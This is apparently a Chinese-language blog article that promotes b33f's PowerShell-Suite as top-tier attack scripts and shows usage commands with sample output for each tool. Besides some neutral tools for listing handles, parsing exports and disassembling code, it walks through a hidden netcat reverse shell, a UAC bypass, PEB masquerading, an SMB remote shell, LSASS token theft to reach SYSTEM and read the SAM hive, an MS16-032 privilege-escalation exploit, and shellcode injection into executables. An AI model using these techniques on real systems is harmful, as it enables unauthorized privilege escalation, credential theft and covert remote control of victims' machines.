神级脚本大集合之PowerShell-Suite
PowerShell-Suite是b33f创建的一个GitHub项目,主要收集了目前神器级别的PowerShell攻击脚本。所以个人感觉很值得向大家详细介绍一下里面各个脚本的使用方法。
这里主要介绍了调用了Windows API的PowerShell脚本。
功能等同于Windows下的runas.exe,调用Advapi32::CreateProcessWithLogonW。
Start cmd with a local account.
C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1
Start cmd with remote credentials. Equivalent to "/netonly" in runas.
C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2
调用Netapi32::NetSessionEnum去枚举域内计算机的活动会话。
Enumerate active sessions on "SomeHostName".
C:\PS> Invoke-NetSessionEnum -HostName SomeHostName
调用Kernel32::CreateProcess实现对进程的精准控制。
Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1
Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
使用多种技术来检查调试器是否存在。
Sample below is x64 Win8, WinDbg attached to PowerShell.
C:\PS> Detect-Debug
[+] Detect Kernel-Mode Debugging
[?] SystemKernelDebuggerInformation: False
[+] Detect User-Mode Debugging
[?] CloseHandle Exception: Detected
[?] IsDebuggerPresent: Detected
[?] CheckRemoteDebuggerPresent: Detected
[?] PEB!BeingDebugged: Detected
[?] PEB!NtGlobalFlag: Detected
[?] DebugSelf: Detected
调用NtQuerySystemInformation::SystemHandleInformation去获取指定进程的句柄列表。
Get handles for PID 2288
C:\PS> Get-Handles -ProcID 2288
[>] PID 2288 --> notepad
[+] Calling NtQuerySystemInformation::SystemHandleInformation
[?] Success, allocated 449300 byte result buffer
[>] Result buffer contains 28081 SystemHandleInformation objects
[>] PID 2288 has 71 handle objects
PID ObjectType HandleFlags Handle KernelPointer AccessMask
--- ---------- ----------- ------ ------------- ----------
2288 Directory NONE 0x0004 0x88E629F0 0x00000000
2288 File NONE 0x0008 0x84560C98 0x00100000
2288 File NONE 0x000C 0x846164F0 0x00100000
2288 Key NONE 0x0010 0xA3067A80 0x00020000
2288 ALPC Port NONE 0x0014 0x8480C810 0x001F0000
2288 Mutant NONE 0x0018 0x8591FEB8 0x001F0000
2288 Key NONE 0x001C 0x96719C48 0x00020000
2288 Event NONE 0x0020 0x850C6838 0x001F0000
...Snip...
打开进程的句柄,并调用Advapi32 :: GetTokenInformation列出与进程相关联的特权。
Get token privileges for PID 3836
C:\PS> Get-TokenPrivs -ProcID 3836
[?] PID 3836 --> calc
[+] Process handle: 1428
[+] Token handle: 1028
[+] Token has 5 privileges:
LUID Privilege
---- ---------
19 SeShutdownPrivilege
23 SeChangeNotifyPrivilege
25 SeUndockPrivilege
33 SeIncreaseWorkingSetPrivilege
34 SeTimeZonePrivilege
获取DLL导出并且可以选择 C++ wrapper输出,它会将DLL读入内存,然后解释它们。所以不管是x32还是x64的DLL都可以解释执行。
PS C:\> Get-Exports -DllPath C:\Windows\System32\ubpm.dll
[?] 32-bit Image!
[>] Time Stamp: 07/15/2016 18:07:55
[>] Function Count: 16
[>] Named Functions: 16
[>] Ordinal Base: 1
[>] Function Array RVA: 0x2F578
[>] Name Array RVA: 0x2F5B8
[>] Ordinal Array RVA: 0x2F5F8
Ordinal ImageRVA FunctionName
------- -------- ------------
1 0x000242A0 UbpmAcquireJobBackgroundMode
2 0x00004750 UbpmApiBufferFree
3 0x00004E30 UbpmCloseTriggerConsumer
4 0x000135E0 UbpmInitialize
5 0x00008D00 UbpmOpenTriggerConsumer
6 0x000242C0 UbpmReleaseJobBackgroundMode
7 0x00013230 UbpmSessionStateChanged
8 0x000242E0 UbpmTerminate
9 0x00003BD0 UbpmTriggerConsumerConfigure
10 0x000040C0 UbpmTriggerConsumerControl
11 0x00025B10 UbpmTriggerConsumerControlNotifications
12 0x00025B40 UbpmTriggerConsumerQueryStatus
13 0x0000E1B0 UbpmTriggerConsumerRegister
14 0x000043F0 UbpmTriggerConsumerSetDisabledForUser
15 0x00012480 UbpmTriggerConsumerSetStatePublishingSecurity
16 0x00005330 UbpmTriggerConsumerUnregister
Bypass-UAC提供了一个能够进行UAC绕过的框架,该框架可以通过调用IFileOperation COM对象所提供的方法来实现自动提权。这其实并不是一种新的技术了,在此之前,我们可以通过向“explorer.exe”进程注入DLL来实现UAC绕过。但是这种方式并不是最有效的,因为向explorer注入DLL很有可能会触发系统的安全警报。不仅如此,利用这种固定的、无法控制的DLL来实现UAC绕过,将会极大地降低操作的灵活性。
C:\PS> Bypass-UAC -Method ucmDismMethod
[!] Impersonating explorer.exe!
[+] PebBaseAddress: 0x000007F73E93F000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x000000569B5F1780
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x000000569B5F1790
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x000000569B5F2208
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x000000569B5F2218
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
[>] Dropping proxy dll..
[+] 64-bit Yamabiko: C:\Users\b33f\AppData\Local\Temp\yam1730961377.tmp
[>] Creating XML trigger: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
[>] Performing elevated IFileOperation::MoveItem operation..
[?] Executing PkgMgr..
[!] UAC artifact: C:\Windows\System32\dismcore.dll
[!] UAC artifact: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
它可以使用PSReflect组件。这个函数可以重写PowerShell的PEB结构,从而实现伪装“explorer.exe”的目的。
C:\PS> Masquerade-PEB -BinPath C:\Windows\System32\notepad.exe
[?] PID 2756
[+] PebBaseAddress: 0x7FFD3000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x002F11F8
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x002F1200
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x002F1B74
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x002F1B7C
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
这是一个基于SMB通信协议的交互式Shell。
Server:
PS C:\> Invoke-SMBShell
+-------
| Host Name: 0AK
| Named Pipe: tapsrv.5604.yk0DxXvjUD9xwyJ9
| AES Key: q6EKfuJTX93YUnmX
+-------
[>] Waiting for client..
SMB shell: whoami
0ak\b33f
SMB shell: IdontExist
The term 'IdontExist' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
SMB shell: $PSVersionTable
Name Value
---- -----
PSRemotingProtocolVersion 2.2
BuildVersion 6.2.9200.17065
PSCompatibleVersions {1.0, 2.0, 3.0}
PSVersion 3.0
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
SerializationVersion 1.1.0.1
SMB shell: leave
[!] Client disconnecting..
[>] Waiting for client..
SMB shell: calc
Job SMBJob-dVkIkAkXINjMe09S completed successfully!
SMB shell: exit
[!] Client disconnecting..
[!] Terminating server..
PS C:\>
Client:
# Client disconnected because of "leave" command
PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
# Client disconnected because "exit" command kills client/server
PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
使用SeDebugPrivilege复制LSASS访问令牌,然后冒用它调用线程。如果SeDebugPrivilege被禁用,我们可以重新启用它。
Conjure LSASS into our midst!
C:\PS> Conjure-LSASS
[?] SeDebugPrivilege is available!
[+] Current process handle: 852
[>] Calling Advapi32::OpenProcessToken
[+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: 2000
[?] SeDebugPrivilege is enabled!
[>] Calling Advapi32::OpenProcessToken --> LSASS
[+] Token handle with TOKEN_IMPERSONATE|TOKEN_DUPLICATE: 1512
[>] Calling Advapi32::DuplicateToken --> LSASS
[+] Duplicate token handle with SecurityImpersonation level: 2008
[>] Calling Advapi32::SetThreadToken
[+] Knock knock .. who's there .. LSASS
[+] User context: SYSTEM
C:\PS> whoami
ERROR: Access is denied.
ERROR: Access is denied.
C:\PS> Get-ChildItem -Path hklm:SAM
Hive: HKEY_LOCAL_MACHINE\SAM
SKC VC Name Property
--- -- ---- --------
3 2 SAM {C, ServerDomainUpdates}
这是使用powershell实现的MS16-032的漏洞利用脚本,MS16-032是Windows提权漏洞,大家都懂得啊,不解释了。
目标:
Win7-Win10 & 2k8-2k12 <== 32/64 bit!
Tested on x32 Win7, x64 Win8, x64 2k12R2
Sit back and watch the pwn!
C:\PS> Invoke-MS16-032
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 956
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 964
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
将shellcode注入到PE映像中。
Analyse the PE header and hexdump the region of memory where shellcode would be injected.
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe
Same as above but continue to inject shellcode and overwrite the binary.
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
使用Capstone引擎从其入口点递归地拆解PE(x32 / x64),由于反汇编是静态的,x32 / x64 PE都可以反汇编,不管PowerShell的位数。
PS C:\> Trace-Execution -Path .\Desktop\some.exe -InstructionCount 10
[>] 32-bit Image!
[?] Call table:
Address Mnemonic Taken Reason
------- -------- ----- ------
0x4AD0829A call Yes Relative offset call
0x4AD07CB7 call No Indirect call
[?] Instruction trace:
Size Address Mnemonic Operands Bytes RegRead RegWrite
---- ------- -------- -------- ----- ------- --------
5 0x4AD0829A call 0x4ad07c89 {232, 234, 249, 255...} {esp}
2 0x4AD07C89 mov edi, edi {139, 255, 249, 255...}
1 0x4AD07C8B push ebp {85, 255, 249, 255...} {esp} {esp}
2 0x4AD07C8C mov ebp, esp {139, 236, 249, 255...}
3 0x4AD07C8E sub esp, 0x10 {131, 236, 16, 255...} {eflags}
5 0x4AD07C91 mov eax, dword ptr [0x4ad240ac] {161, 172, 64, 210...}
4 0x4AD07C96 and dword ptr [ebp - 8], 0 {131, 101, 248, 0...} {eflags}
4 0x4AD07C9A and dword ptr [ebp - 4], 0 {131, 101, 252, 0...} {eflags}
1 0x4AD07C9E push ebx {83, 101, 252, 0...} {esp} {esp}
1 0x4AD07C9F push edi {87, 101, 252, 0...} {esp} {esp}
5 0x4AD07CA0 mov edi, 0xbb40e64e {191, 78, 230, 64...}
5 0x4AD07CA5 mov ebx, 0xffff0000 {187, 0, 0, 255...}
2 0x4AD07CAA cmp eax, edi {59, 199, 0, 255...} {eflags}
6 0x4AD07CAC jne 0x4ad1bc8c {15, 133, 218, 63...} {eflags}
1 0x4AD07CB2 push esi {86, 133, 218, 63...} {esp} {esp}
3 0x4AD07CB3 lea eax, dword ptr [ebp - 8] {141, 69, 248, 63...}
1 0x4AD07CB6 push eax {80, 69, 248, 63...} {esp} {esp}
6 0x4AD07CB7 call dword ptr [0x4ad01150] {255, 21, 80, 17...} {esp}
3 0x4AD07CBD mov esi, dword ptr [ebp - 4] {139, 117, 252, 0...}
3 0x4AD07CC0 xor esi, dword ptr [ebp - 8] {51, 117, 248, 0...} {eflags}